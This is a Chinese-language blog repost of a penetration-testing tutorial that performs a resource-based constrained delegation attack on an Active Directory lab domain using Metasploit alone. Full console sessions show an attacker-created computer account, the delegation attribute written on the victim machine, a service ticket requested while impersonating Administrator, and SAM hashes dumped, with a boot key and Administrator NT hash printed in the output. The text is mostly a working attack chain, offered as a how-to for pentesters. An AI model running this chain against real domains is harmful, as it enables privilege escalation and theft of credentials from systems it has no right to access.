使用纯Metasploit开发基于资源的约束委托(RBCD)

admin 2023年7月6日10:16:15评论19 views字数 8628阅读28分45秒阅读模式
  Metasploit最近发布了6.3版本。& nbsp;随之而来的是大量与LDAP操作和使用Kerberos身份验证相关的新特性。
演示如何执行GenericWrite->RBCD攻击。通常情况下,用户对计算机没有管理访问权限,但对计算机具有GenericWrite权限或等效权限(GenericAll、Owns等)。通过利用此配置,可以获得计算机上的管理员访问权限。目前有两种主要的方法来执行这种攻击,要么使用Rubeus/Powermad/Powerview的组合,要么使用Impacket中的各种脚本。

使用纯Metasploit开发基于资源的约束委托(RBCD)


为了解释一些新特性,我将比较Metasploit中的模块和Impacket中的模块。
首先,要执行此攻击,您需要一个计算机帐户。& nbsp;如果您还没有一个在您的控制之下,您将需要创建一个。在Impacket中,我们将使用addcomputer.py,但在这里,我们将使用辅助/admin/dcerpc/samr_computer。
msf6 auxiliary(admin/dcerpc/samr_computer)> show options
Module options (auxiliary/admin/dcerpc/samr_computer):
Name Current Setting Required Description---- --------------- -------- -----------COMPUTER_NAME no The computer nameRHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT 445 yes The target port (TCP)SMBDomain n00py.local no The Windows domain to use for authenticationSMBPass Password1 no The password for the specified usernameSMBUser n00py no The username to authenticate as
When ACTION is ADD_COMPUTER:
Name Current Setting Required Description---- --------------- -------- -----------COMPUTER_PASSWORD no The password for the new computer
Auxiliary action:
Name Description---- -----------ADD_COMPUTER Add a computer account View the full module info with the info, or info -d command.
msf6 auxiliary(admin/dcerpc/samr_computer) > run[*] Running module against 172.16.73.6[+] 172.16.73.6:445 - Successfully created n00py.localDESKTOP-MKFA61G6$[+] 172.16.73.6:445 - Password: 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj[+] 172.16.73.6:445 - SID: S-1-5-21-3387312503-3460017432-368973690-1135[*] Auxiliary module execution completed

一旦您获得了新的计算机帐户,我们就必须在受害者计算机上配置委派权限。& nbsp;对于Impacket,我们将使用rbcd.py,但这里我们将使用辅助/admin/ldap/rbcd。

msf6 auxiliary(admin/ldap/rbcd) > show options Module options (auxiliary/admin/ldap/rbcd): Name          Current Setting    Required Description----          ---------------    -------- -----------DELEGATE_FROM DESKTOP-MKFA61G6$  no       The delegation sourceDELEGATE_TO   WIN-27M967MQJL4$   yes      The delegation targetDOMAIN        n00py.local        no       The domain to authenticate toPASSWORD      Password1          no       The password to authenticate withRHOSTS        172.16.73.6        yes      The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT         389                yes      The target portSSL           false              no       Enable SSL on the LDAP connectionUSERNAME      n00py              no       The username to authenticate with  View the full module info with the info, or info -d command. msf6 auxiliary(admin/ldap/rbcd) > read[*] Running module against 172.16.73.6 [+] Successfully bound to the LDAP server![*] Discovering base DN automatically[*] 172.16.73.6:389 Getting root DSE[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local[*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.[*] Auxiliary module execution completedmsf6 auxiliary(admin/ldap/rbcd) > write[*] Running module against 172.16.73.6 [+] Successfully bound to the LDAP server![*] Discovering base DN automatically[*] 172.16.73.6:389 Getting root DSE[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local[+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.[*] Added account:[*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)[*] Auxiliary module execution completedmsf6 auxiliary(admin/ldap/rbcd) > read[*] Running module against 172.16.73.6 [+] Successfully bound to the LDAP server![*] Discovering base DN automatically[*] 172.16.73.6:389 Getting root DSE[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local[*] Allowed accounts:[*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)[*] Auxiliary module execution completed

一旦我们配置了委派,我们就可以为任何用户请求服务票证。& nbsp;对于Impacket,我们将使用getST.py,但这里我们将使用辅助/admin/kerberos/get_ticket。我们将使用Metasploit保存的最终服务票证。

msf6 auxiliary(admin/kerberos/get_ticket) > show options Module options (auxiliary/admin/kerberos/get_ticket): Name            Current Setting                 Required Description----            ---------------                 -------- -----------AES_KEY                                          no      The AES key to use for Kerberos authentication in hex string. Supported keys: 128 or 256 bitsCERT_FILE                                        no      The PKCS12 (.pfx) certificate file to authenticate withCERT_PASSWORD                                    no      The certificate file's passwordDOMAIN         n00py.local                       no      The Fully Qualified Domain Name (FQDN). Ex: mydomain.localNTHASH                                           no      The NT hash in hex string. Server must support RC4PASSWORD       7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj  no      The domain user's passwordRHOSTS         172.16.73.6                       yes     The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT          88                                yes     The target portTimeout        10                                yes     The TCP timeout to establish Kerberos connection and read dataUSERNAME       DESKTOP-MKFA61G6$                 no      The domain user  When ACTION is GET_TGS: Name         Current Setting                    Required   Description----         ---------------                    --------   -----------IMPERSONATE  Administrator                      no         The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to request the ticket)SPN          CIFS/WIN-27M967MQJL4.n00py.local   no         The Service Principal Name, format is service_name/FQDN. Ex: cifs/dc01.mydomain.local  Auxiliary action: Name Description---- -----------GET_TGS Request a Ticket-Granting-Service (TGS)    View the full module info with the info, or info -d command. msf6 auxiliary(admin/kerberos/get_ticket) > set verbose trueverbose => truemsf6 auxiliary(admin/kerberos/get_ticket) > run[*] Running module against 172.16.73.6 [+] 172.16.73.6:88 - Received a valid TGT-Response[*] 172.16.73.6:88 - TGT MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_994901.bin[*] 172.16.73.6:88 - Getting TGS impersonating [email protected] (SPN: CIFS/WIN-27M967MQJL4.n00py.local)[+] 172.16.73.6:88 - Received a valid TGS-Response[*] 172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_606526.bin[+] 172.16.73.6:88 - Received a valid TGS-Response[*] 172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin[*] Auxiliary module execution completed

最后,一旦我们有了这个票,我们就可以在目标上执行管理操作。通常情况下,pentester会使用Impacket的secretsdump.py或CrackMapExec(在后台是相同的东西)来恢复系统的凭据。我们可以使用Metasploit的辅助/gather/windows_secrets_dump模块来执行此操作,相当于在CrackMapExec中同时运行-sam和-lsa。这里唯一棘手的部分是使其与Kerberos身份验证一起工作,这需要进入高级选项。

msf6 auxiliary(gather/windows_secrets_dump) > show options Module options (auxiliary/gather/windows_secrets_dump): Name        Current Setting   Required   Description----        ---------------   --------   -----------RHOSTS      172.16.73.12      yes        The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT       445               yes        The target port (TCP)SMBDomain   n00py.local       no         The Windows domain to use for authenticationSMBPass                       no         The password for the specified usernameSMBUser     Administrator     no         The username to authenticate as  Auxiliary action: Name   Description----   -----------ALL    Dump everything    View the full module info with the info, or info -d command. msf6 auxiliary(gather/windows_secrets_dump) > show advanced Module advanced options (auxiliary/gather/windows_secrets_dump): Name        Current Setting   Required   Description----        ---------------   --------   -----------[TRUNCATED] SMB::Auth   kerberos          yes        The Authentication mechanism to use (Accepted: auto, ntlm, kerberos) [TRUNCATED] Active when SMB::Auth is kerberos: Name                           Current Setting                                                                  Required Description----                           ---------------                                                                  -------- -----------DomainControllerRhost          WIN-NDA9607EHKS.n00py.local                                                      no       The resolvable rhost for the Domain ControllerKrbCacheMode                   read-write                                                                       yes      Kerberos ticket cache storage mode (Accepted: none, read-only, write-only, read-write)SMB::Krb5Ccname                /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin  no       The ccache file to use for kerberos authenticationSMB::KrbOfferedEncryptionTypes AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1                                 yes      Kerberos encryption types to offerSMB::Rhostname                 WIN-27M967MQJL4.n00py.local                                                      no       The rhostname which is required for kerberos - the SPN  View the full module info with the info, or info -d command. msf6 auxiliary(gather/windows_secrets_dump) > run[*] Running module against 172.16.73.12 [*] 172.16.73.12:445 - Opening Service Control Manager[*] 172.16.73.12:445 - Binding to svcctl...[+] 172.16.73.12:445 - Bound to svcctl[*] 172.16.73.12:445 - Service RemoteRegistry is in stopped state[*] 172.16.73.12:445 - Starting service...[*] 172.16.73.12:445 - Retrieving target system bootKey[*] 172.16.73.12:445 - Retrieving class info for SYSTEMCurrentControlSetControlLsaJD[*] 172.16.73.12:445 - Retrieving class info for SYSTEMCurrentControlSetControlLsaSkew1[*] 172.16.73.12:445 - Retrieving class info for SYSTEMCurrentControlSetControlLsaGBG[*] 172.16.73.12:445 - Retrieving class info for SYSTEMCurrentControlSetControlLsaData[+] 172.16.73.12:445 - bootKey: 0x1a9c42b4c664bb5ab1c699858559fc76[*] 172.16.73.12:445 - Checking NoLMHash policy[*] 172.16.73.12:445 - LMHashes are not being stored[*] 172.16.73.12:445 - Saving remote SAM database[*] 172.16.73.12:445 - Create SAM key[*] 172.16.73.12:445 - Save key to PUnE0CMU.tmp[*] 172.16.73.12:445 - Dumping SAM hashes[*] 172.16.73.12:445 - Calculating HashedBootKey from SAM[*] 172.16.73.12:445 - Password hints:No users with password hints on this system[*] 172.16.73.12:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):Administrator:500:aad3b435b51404eeaad3b435b51404ee:b0abb98152c261c4c23429ed9eecc117::: [TRUNCATED] [*] Auxiliary module execution completed


承接以下业务:

使用纯Metasploit开发基于资源的约束委托(RBCD)

欢迎添加微信业务咨询:

            使用纯Metasploit开发基于资源的约束委托(RBCD)




原文始发于微信公众号(网络安全交流圈):使用纯Metasploit开发基于资源的约束委托(RBCD)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月6日10:16:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   使用纯Metasploit开发基于资源的约束委托(RBCD)https://cn-sec.com/archives/1849016.html

发表评论

匿名网友 填写信息